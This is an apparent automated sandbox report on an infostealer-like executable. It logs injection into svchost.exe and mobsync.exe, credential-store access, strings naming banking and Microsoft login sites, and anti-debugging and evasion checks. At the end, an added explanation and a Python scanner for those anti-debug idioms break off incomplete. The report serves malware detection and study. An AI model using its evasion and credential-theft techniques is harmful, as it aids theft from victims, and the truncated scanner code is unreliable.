                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1858071682.0000000002EB8000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3899096271.0000000002EA3000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1858125277.0000000002EA3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: qbSIgCrCgw.exe | ReversingLabs: Detection: 75%
                Source: qbSIgCrCgw.exe | Virustotal: Detection: 68%
                Source: unknown | Process created: C:\Users\user\Desktop\qbSIgCrCgw.exe "C:\Users\user\Desktop\qbSIgCrCgw.exe"
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\qbSIgCrCgw.exe"
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                Source: C:\Windows\SysWOW64\mobsync.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\mobsync.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: qbSIgCrCgw.exe | Static file information: File size 1223168 > 1048576
                Source: qbSIgCrCgw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: qbSIgCrCgw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: qbSIgCrCgw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: qbSIgCrCgw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: qbSIgCrCgw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: qbSIgCrCgw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: qbSIgCrCgw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.1637196101.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637295915.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637317162.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000002.3899623920.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WafZCahkNS.exe, 00000004.00000000.1588467968.000000000042E000.00000002.00000001.01000000.00000005.sdmp, WafZCahkNS.exe, 00000008.00000002.3899225250.000000000042E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: qbSIgCrCgw.exe, 00000000.00000003.1442854618.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000003.1439827599.0000000003610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569421603.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1571730038.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.0000000003500000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3900326799.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3900326799.0000000004BAE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1675481440.0000000004864000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1673465215.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: qbSIgCrCgw.exe, 00000000.00000003.1442854618.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000003.1439827599.0000000003610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1569421603.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1571730038.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.0000000003500000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000006.00000002.3900326799.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3900326799.0000000004BAE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1675481440.0000000004864000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1673465215.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.1637196101.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637295915.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637317162.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000002.3899623920.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000006.00000002.3901773244.000000000503C000.00000004.10000000.00040000.00000000.sdmp, mobsync.exe, 00000006.00000002.3899096271.0000000002E29000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.000000000283C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1965350475.00000000007EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000006.00000002.3901773244.000000000503C000.00000004.10000000.00040000.00000000.sdmp, mobsync.exe, 00000006.00000002.3899096271.0000000002E29000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.000000000283C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1965350475.00000000007EC000.00000004.80000000.00040000.00000000.sdmp
                Source: qbSIgCrCgw.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: qbSIgCrCgw.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: qbSIgCrCgw.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: qbSIgCrCgw.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: qbSIgCrCgw.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003CE01E LoadLibraryA,GetProcAddress, 0_2_003CE01E
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003C288A push 66003C23h; retn 0042h 0_2_003C28E1
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003D6B05 push ecx; ret 0_2_003D6B18
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004143C1 push cs; ret 2_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403070 push eax; ret 2_2_00403072
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004120AF push ebp; retf 2_2_004120B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418172 push esi; retf 2_2_0041817D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040AADE push ebp; iretd 2_2_0040AAE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414344 push cs; ret 2_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417C7C push esi; iretd 2_2_00417C7F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413D3D push esp; ret 2_2_00413D3E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040CE68 push ecx; retf 2_2_0040CE6B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0350225F pushad ; ret 2_2_035027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035027FA pushad ; ret 2_2_035027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035309AD push ecx; mov dword ptr [esp], ecx 2_2_035309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0350283D push eax; iretd 2_2_03502858
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0350135E push eax; iretd 2_2_03501369
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_04A409AD push ecx; mov dword ptr [esp], ecx 6_2_04A409B6
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_02A48330 pushfd ; retf 6_2_02A4833B
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_02A42414 push ecx; retf 6_2_02A4244C
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_02A50E12 push edx; iretd 6_2_02A50E13
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_02A50FE1 push cs; ret 6_2_02A50FE2
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_02A40CCA push esp; ret 6_2_02A40CCB
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_02A44C09 push esi; iretd 6_2_02A44C0C
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_02A4ED60 push esi; retf 6_2_02A4ED6B
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_02A450FF push esi; retf 6_2_02A4510A
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_02A3F03C push ebp; retf 6_2_02A3F03D
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_02A37A6B push ebp; iretd 6_2_02A37A6D
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_04870695 push ebx; ret 6_2_04870696
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_0486469F push edi; ret 6_2_048646A2
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_048657E0 push esp; ret 6_2_048657E1
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_04875182 push eax; ret 6_2_04875184
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_00418111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00418111
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003CEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_003CEB42
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003D123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003D123A
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeAPI/Special instruction interceptor: Address: 100A774
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: qbSIgCrCgw.exe, 00000000.00000003.1432082615.0000000000FC5000.00000004.00000020.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000003.1432178200.000000000103C000.00000004.00000020.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000002.1445241515.000000000103C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E rdtsc 2_2_0357096E
                Source: C:\Windows\SysWOW64\mobsync.exeWindow / User API: threadDelayed 9801Jump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeEvaded block: after key decisiongraph_0-93650
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeAPI coverage: 4.2 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\mobsync.exeAPI coverage: 2.4 %
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 2056Thread sleep count: 171 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 2056Thread sleep time: -342000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 2056Thread sleep count: 9801 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 2056Thread sleep time: -19602000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe TID: 4640Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe TID: 4640Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe TID: 4640Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe TID: 4640Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_003F6CA9
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003F60DD
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003F63F9
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003FEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003FEB60
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003FF56F FindFirstFileW,FindClose,0_2_003FF56F
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003FF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003FF5FA
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00401B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00401B2F
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00401C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00401C8A
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00401F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00401F94
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A4C560 FindFirstFileW,FindNextFileW,FindClose,6_2_02A4C560
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003CDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003CDDC0
                Source: 10O4645j.6.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 10O4645j.6.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 10O4645j.6.dr | Binary or memory string: AMC password management pageVMware20,11696494690
                Source: 10O4645j.6.dr | Binary or memory string: outlook.office.comVMware20,11696494690s
                Source: 10O4645j.6.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 10O4645j.6.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 10O4645j.6.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: 10O4645j.6.dr | Binary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 10O4645j.6.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 10O4645j.6.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 10O4645j.6.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 10O4645j.6.dr | Binary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 10O4645j.6.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 10O4645j.6.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 10O4645j.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 10O4645j.6.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: 10O4645j.6.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E29000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000009.00000002.1966803385.000001B0C06CC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC
                Source: 10O4645j.6.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 10O4645j.6.dr | Binary or memory string: tasks.office.comVMware20,11696494690o
                Source: 10O4645j.6.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: 10O4645j.6.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 10O4645j.6.dr | Binary or memory string: dev.azure.comVMware20,11696494690j
                Source: 10O4645j.6.dr | Binary or memory string: global block list test formVMware20,11696494690
                Source: 10O4645j.6.dr | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 10O4645j.6.dr | Binary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 10O4645j.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 10O4645j.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: WafZCahkNS.exe, 00000008.00000002.3899961087.000000000091F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
                Source: 10O4645j.6.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 10O4645j.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 10O4645j.6.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 10O4645j.6.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | API call chain: ExitProcess graph end node (graph_0-93773)
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\mobsync.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0357096E rdtsc
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417543 LdrLoadDll
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_00406AAF BlockInput
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003B3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003E3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003CE01E LoadLibraryA,GetProcAddress
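The rdtsc hit above and the long run of "mov eax, dword ptr fs:[00000030h]" entries that follow are the two classic debugger checks that need no API call: on 32-bit Windows (the SysWOW64 paths show the injected code runs as a 32-bit process) fs:[0x30] is the PEB pointer in the TEB, and once a register holds the PEB, a byte load at +0x02 reads PEB.BeingDebugged and a dword load at +0x68 reads PEB.NtGlobalFlag, whose heap-debug bits (0x70) are set when a process starts under a debugger; two rdtsc reads around a code region give the timing check. The scanner below is an added example, not code from the report, from Joe Sandbox or from the sample: it finds those encodings in a raw byte buffer and, for each PEB read, looks a few bytes ahead for the follow-on field load, which is what separates a debugger check from an ordinary PEB read. The byte buffer at the bottom is constructed for the demonstration and is not taken from the analysed file; the register-to-ModRM mapping and the PEB offsets are the documented x86 and Windows values.

```python
# Added example, not code from the report or from the sample it analyses.
# Static scanner for the x86 anti-analysis idioms the report entries list:
# reads of the PEB pointer through fs:[30h] and rdtsc timing checks.
from collections import Counter

# Encodings of the flagged instructions (32-bit x86, which the SysWOW64 paths imply).
# 0x64 is the FS segment override. A1 = MOV EAX, moffs32. 8B /r = MOV r32, r/m32
# with ModRM mod=00 rm=101 (disp32 only): 0x0D puts the load in ecx, 0x35 in esi.
PEB_READS = {
    # pattern: (mnemonic as the report prints it, rm code of the destination register)
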